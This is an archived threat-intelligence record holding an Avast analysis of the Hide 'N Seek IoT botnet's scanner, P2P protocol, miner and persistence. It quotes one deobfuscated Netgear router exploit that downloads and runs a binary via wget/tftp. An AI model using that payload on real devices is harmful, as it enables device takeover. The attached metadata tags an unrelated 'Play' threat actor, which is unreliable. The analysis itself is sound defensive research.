{
	"id": "6a8d2e3c-a349-4a86-9b80-75ed2721f5b9",
	"created_at": "2026-04-06T00:09:22.728526Z",
	"updated_at": "2026-04-10T13:11:56.045574Z",
	"deleted_at": null,
	"sha1_hash": "cbf7b0d41d7b099fa04b774fe764ca5aed922e35",
	"title": "Let’s play Hide ’N Seek with a botnet.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 82558,
	"plain_text": "Let’s play Hide ’N Seek with a botnet.\r\nBy Threat Intelligence Team 4 Dec 2018\r\nArchived: 2026-04-05 16:41:44 UTC\r\nHide ‘N Seek botnet continues infecting devices with default credentials, building a P2P network and more.\r\nWritten by Adolf Středa and Jan Neduchal\r\nIn late January 2018, a new IoT botnet was reported by Bitdefender[1]. The botnet uses several known vulnerabilities to\r\ninfect new IoT devices and utilizes a home-brewed P2P protocol to facilitate communication across the botnet. While this\r\nbotnet differs in many ways, its infection vectors and techniques are very similar to those of Mirai. Indeed, many\r\nparts of the related functions exhibit all signs of code reuse, as was noted in April 2018 by J. Manuel from Fortinet[3].\r\nThe Hide ‘N Seek botnet has two main functionalities. The first functionality is provided by a scanner module, whose code\r\nseems to be mostly borrowed from the released Mirai source code. This scanner tries to reach several random IP addresses\r\nthrough predefined ports (ports 80, 8080, 2480, 5984, and 23) and then exploits those devices that have these ports open.\r\nThe exploits used are mostly well known, and any specific strings they need are obfuscated by a simple home-brewed\r\ncipher with a hardcoded key. 
Interestingly, due to the structure of the cipher and a small key-space, the cipher has an\r\ninteresting property - the key ‘self-synchronizes’ to the right value after several characters even if a wrong key was initially\r\nprovided.\r\nGET /setup.cgi?next_file=netgear.cfg\u0026todo=syscmd\u0026cmd=wget+http://%J/%T+-O+dgn||tftp+-g+-l+dgn+-\r\nr+%T+%I;chmod+777+dgn;./dgn+a%J+a%J%26%26(echo+jA3;killall+mini_httpd)||echo+ukW\u0026curpath=/tmp\u0026currentsetting.htm\r\nHTTP/1.1\r\nHost: %J\r\nDeobfuscated Netgear router exploit (remote code execution)\r\nIf exploits fail, the scanner will try to brute force credentials with the help of its hard-coded dictionary with more than 250\r\nentries, mostly containing default passwords for various devices. This dictionary consists of 3 blobs of data that is\r\nobfuscated in the same way as other strings in the binary; the only difference is that every entry in the dictionary ends with a\r\nzero-byte that resets the obfuscation key.\r\nThe second functionality facilitates the communication protocol. The protocol is capable of spreading information about\r\nnew peers, distributing new binaries, and propagating files back from an infected device.\r\nP2P protocol\r\nThe Hide ‘N Seek botnet uses a home-brewed protocol that runs over UDP. By default, the bot opens a random port on the\r\nvictim device and adds a firewall rule to allow inbound traffic on the port. 
The protocol itself does not use any kind of\r\nauthentication, although some of the data transferred over it is signed, supposedly by the botnet owner.\r\nThe protocol currently supports the following commands:\r\n\u003crandom 5-16 bytes\u003e\u003cuint8_t checksum\u003e: protocol challenge, ack response expected\r\nO\u003cuint8_t checksum\u003e: acknowledgement (checksum generated from the previous message)\r\nh\u003cuint32_t current_version\u003e: config version request\r\nhttps://blog.avast.com/hide-n-seek-botnet-continues\r\nPage 1 of 5\n\nH\u003cuint32_t offered_version\u003e: config version response\r\nY\u003cuint8_t hash[64]\u003e\u003cuint16_t seq\u003e\u003cuint16_t chunk_index\u003e: send data from file identified by\r\nhash from location at 256 * chunk_index (max. 256 bytes)\r\ny\u003cuint8_t hash[64]\u003e\u003cuint16_t chunk_index\u003e\u003cuint16_t seq\u003e: receive data (ditto)\r\nz\u003cuint32_t ip_address\u003e\u003cuint16_t port\u003e: report a device to be scanned\r\nm\u003cuint8_t hash[64]\u003e\u003cuint32_t ip\u003e\u003cuint16_t port\u003e\u003cuint16_t id\u003e\u003cuint8_t hops\u003e\u003cuint8_t unknown\u003e: send file identified\r\nby hash to ip:port; if the file is not known and hops is positive then broadcast this message to other peers with decremented\r\nhops; it is used to initiate a file transfer\r\n^\u003cuint8_t flag\u003e\u003cuint16_t port\u003e\u003cuint32_t ip_address\u003e: response with a peer’s address/port\r\n~: request an address/port of another peer\r\nBotnet tracker\r\nWe decided to track the botnet’s communication via its rather simplistic P2P protocol. 
The tracker consists of two parts:\r\nA downloader that tracks the updates of binaries over the botnet’s configuration file\r\nA client that tracks the botnet’s activity and tries to find new peers.\r\nThe tracker itself is available at https://threatlabs.avast.com/botnet, and it should also serve as a reference aggregator for any\r\nresearch about Hide ’N Seek we publish.\r\nFile extraction\r\nEach peer has a configuration file with a list of SHA-512 hashes of other files that are available in the botnet, along with\r\ntheir respective file lengths. To retrieve a configuration file from the peer, we need to query the peer for a file with a zero-hash. Using the command “h” we may retrieve its version beforehand. Afterward, retrieving all the files available is just a\r\nmatter of parsing the configuration file and querying contained hashes. Aside from Hide ‘N Seek binaries for various\r\narchitectures, the configuration file also contains hashes of a miner based on an open-source coinminer-opt. Note that the\r\nconfiguration file always contains its ECDSA signature, effectively mitigating botnet poisoning.\r\nTo prevent peer brute forcing, we employ a simple failsafe based on a failure-rate which will stop queries if they are\r\nunsuccessful after a certain number of attempts. Currently, several architectures are supported by this botnet such as x86,\r\nMIPS, and ARM.\r\nPeer exploration\r\nAs the botnet has a purely P2P architecture, every piece of data necessary for analysis can be obtained through peers. To\r\nestimate the botnet prevalence, we have exploited this property to recursively find new peers, along with mapping the\r\nconnections between them.\r\nUnfortunately, every peer selects a subset of its peer-list (usually 1 or 2 peers) that may be shared with a peer on that day.\r\nBecause of this, we had to expand our peer list over time. 
It took us a few days for the peer list to reach a total of 1k peers,\r\nand then the list grew linearly adding 1-2k new peers per day. The list of currently active peers is rather small, with\r\napproximately 14% of them active during a 1-day sliding window.\r\nLost N’ Found in the tracker\r\nVersion changes\r\nAs noted by various researchers (e.g. [2]), the Hide ‘N Seek botnet has added support for persistence. This is done by\r\ncopying itself to /etc/init.d and, in newer versions, also to /etc/rc.d under a filename prefixed with S99; the\r\nhigher the number, the later the file is launched during startup.\r\nThe initial analysis was based on a sample 8cb5cb204eab172befcdd5c923c128dd1016c21aaab72e7b31c0359a48d1357e,\r\nwhich we compared to a more recent sample becad1b9d3b67e51404475a0a530b57fd5742f3148f23693c349035dbffddd7. In\r\nterms of exploits, the range was significantly expanded. The former sample contained only two HTTP request-based exploits\r\n(for TP-Link and Netgear devices), while the latest sample expanded attacks to cover more vendors (Cisco) and additional\r\ndevices (Belkin, Avetech IP cameras, HomeMatic IoT device) as well as exploits against misconfigured databases\r\n(MongoDB and CouchDB).\r\nMiner\r\nIt was reported before [4] that the botnet is also distributing binaries which contain a cryptominer. The miner is based on an\r\nopen-source CPU miner called coinminer-opt (JayDDee/cpuminer-opt). The version distributed over the botnet is configured\r\nto mine Monero cryptocurrency under a mining pool https://moriaxmr.com. 
Their payment address is:\r\n42T2ZKueiusgZW2Tpu3NZkChLAVqvqTcvgwzfPtxsTPMDgp8morgWMkEE9oqmNsKZcDUVoCdNufs87fCGE2Y62CcJX4DUhc.\r\nWe can actually track their success on the pool’s dashboard:\r\n[Figure: hide-n-seek-tracker-dashboard]\r\nAs of 31.10.2018, it seems botnet owners have made almost 0.9 XMR, which would roughly translate to only $90. Since it\r\nhas been running for several months now and the last payment was made at least 2 months ago, we speculate that this may\r\nhave been a beta-test, possibly serving as a rough estimate of the botnet’s computing power.\r\nWe have two ways of finding this payment address. The first one is to run the sample and look at the TCP communication\r\nfor strings such as:\r\n{\"method\": \"login\",\r\n\"params\": {\"login\":\r\n\"42T2ZKueiusgZW2Tpu3NZkChLAVqvqTcvgwzfPtxsTPMDgp8morgWMkEE9oqmNsKZcDUVoCdNufs87fCGE2Y62CcJX4DUhc.10\r\n\"pass\": \"3a7\",\r\n\"agent\": \"cpuminer-opt/3.8.8\"},\r\n\"id\": 1}\r\nHowever, this assumes that we are able to run the sample, which is not trivial for some supported architectures. If we dive\r\ndeeper into the binary, we may notice that the address is obfuscated and could be de-obfuscated with the simple python\r\nscript provided below; note that the initial BL value may vary between binaries.\r\n[Figure: hide-n-seek-python-code] Python code implementing address deobfuscation yielding address\r\n42T2ZKueiusgZW2Tpu3NZkChLAVqvqTcvgwzfPtxsTPMDgp8morgWMkEE9oqmNsKZcDUVoCdNufs87fCGE2Y62CcJX4DUhc\r\nYe Olde Architecture\r\nThe configuration file seems to support a plethora of various architectures. 
These architectures were recognized according to\r\ntheir flag (first column) in the ELF binaries.\r\nELF Flag | Common architecture name | Common platform\r\nEM_MIPS | MIPS | Routers, IoT\r\nEM_SPARC | SPARC | Servers\r\nEM_X86_64 | x86-64 | Mainstream PCs/servers\r\nEM_AARCH64 | ARM 64-bit architecture | Smartphones, routers, IoT\r\nEM_ARM | ARM 32-bit architecture | Smartphones, routers, IoT\r\nEM_PPC | PowerPC | Cisco routers, Apple devices till 2016, PS3\r\nEM_ARC_COMPACT | ARC International ARCompact processor | Cars, IoT\r\nEM_386 | x86 | Mainstream PCs/servers\r\nEM_SH | SuperH | Cars, routers (rare)\r\nWhat shall we draw from this analysis:\r\nWhile the botnet is not new, its objectives are still not clear. So far, only the Monero miner was distributed by the\r\nbotnet with a seemingly limited efficiency.\r\nThe botnet exploits devices with old publicly known vulnerabilities and default passwords.\r\nThe botnet continues to slowly evolve, adding new exploits and functionality (such as persistence).\r\nWhat can we do to protect ourselves:\r\nLimit who can access the device’s administration panel to the local network (i.e. 
not available via the internet).\r\nKeep your device’s firmware updated.\r\nChange default passwords on your devices and make sure they are strong passwords.\r\nAnalyzed files (SHA-256)\r\nbecad1b9d3b67e51404475a0a530b57fd5742f3148f23693c349035dbffddd7\r\n8cb5cb204eab172befcdd5c923c128dd1016c21aaab72e7b31c0359a48d1357e\r\n6399f9463c74ee687c047e3a7e0149421de423de77ee278ce364b68d22eada00\r\n12ec8c33abae7f0b06533d96f0d820df4ac673e6ff3965a59d982623f4ddc6bb\r\nD87ff51186c4a75ba0fb802abd55a15d263187aefd489a37f505b025ddc1ee66 (miner)\r\n[1] https://labs.bitdefender.com/2018/01/new-hide-n-seek-iot-botnet-using-custom-built-peer-to-peer-communication-spotted-in-the-wild/, accessed 20.10.2018\r\n[2] https://labs.bitdefender.com/2018/05/hide-and-seek-iot-botnet-resurfaces-with-new-tricks-persistence/, accessed 20.10.2018\r\n[3] https://www.fortinet.com/blog/threat-research/searching-for-the-reuse-of-mirai-code--hide--n-seek-bot.html, accessed 20.10.2018\r\n[4] Sendroiu, A. and Diaconescu, V. (2018). Hide’N’Seek: An Adaptive Peer-to-peer IoT Botnet. In: Proceedings of the 28th Virus Bulletin International Conference. Montreal: Virus Bulletin Ltd, pp. 259-264.\r\nAvast is a global leader in cybersecurity, protecting hundreds of millions of users around the world. Protect all of your\r\ndevices with award-winning free antivirus. Safeguard your privacy and encrypt your online connection with SecureLine\r\nVPN. \r\nLearn more about products that protect your digital life at avast.com. And get all the latest news on today's cyberthreats and\r\nhow to beat them at blog.avast.com.\r\nSource: https://blog.avast.com/hide-n-seek-botnet-continues",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.avast.com/hide-n-seek-botnet-continues"
	],
	"report_names": [
		"hide-n-seek-botnet-continues"
	],
	"threat_actors": [
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434162,
	"ts_updated_at": 1775826716,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/cbf7b0d41d7b099fa04b774fe764ca5aed922e35.pdf",
		"text": "https://archive.orkl.eu/cbf7b0d41d7b099fa04b774fe764ca5aed922e35.txt",
		"img": "https://archive.orkl.eu/cbf7b0d41d7b099fa04b774fe764ca5aed922e35.jpg"
	}
}